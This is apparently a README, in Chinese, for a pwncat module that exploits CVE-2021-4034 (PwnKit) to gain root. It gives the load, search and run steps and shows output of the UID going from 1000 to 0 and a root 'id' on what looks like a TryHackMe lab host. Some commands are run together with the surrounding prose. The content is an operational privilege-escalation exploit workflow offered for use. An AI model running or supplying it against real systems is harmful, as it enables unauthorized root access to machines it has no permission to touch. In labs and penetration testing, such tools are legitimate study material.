该模块的目的是在使用 pwncat 时,尝试在目标上利用 CVE-2021-4034(pwnkit)漏洞。
无需设置任何目录、编译任何源代码,甚至无需在远程目标上安装 gcc;pwnkit 模块会利用 pwncat 框架自动处理这一切。
pwnkit.py 复制到主机上安装了 pwncat-cs 的某个位置,例如:/home/user/pwncat_modsload /home/user/pwncat_modssearch pwnkit。你应该会看到类似这样的内容:(local) pwncat$ search pwnkit
Results
╷
Name │ Description
══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════
pwnkit │ Exploit CVE-2021-4034 to privesc to root
run pwnkit。如果成功,你应该会看到 UID 变为 0,并且现在已是 root。例如:(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0) manager.py:955
Module pwnkit completed successfully run.py:100
(local) pwncat$
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
load,可以将该模块放在 ~/.local/share/pwncat/modules 中,让 pwncat 在启动时自动加载它。# Set the gcc path
set cross "/usr/bin/gcc"
特别感谢 Caleb Stewart,在我从开发者的角度学习 pwncat 框架的过程中给予了很大帮助。等我有空的时候,我一定会提交一个拉取请求,把这个模块加入主 pwncat escalate 模块中……我保证。:-)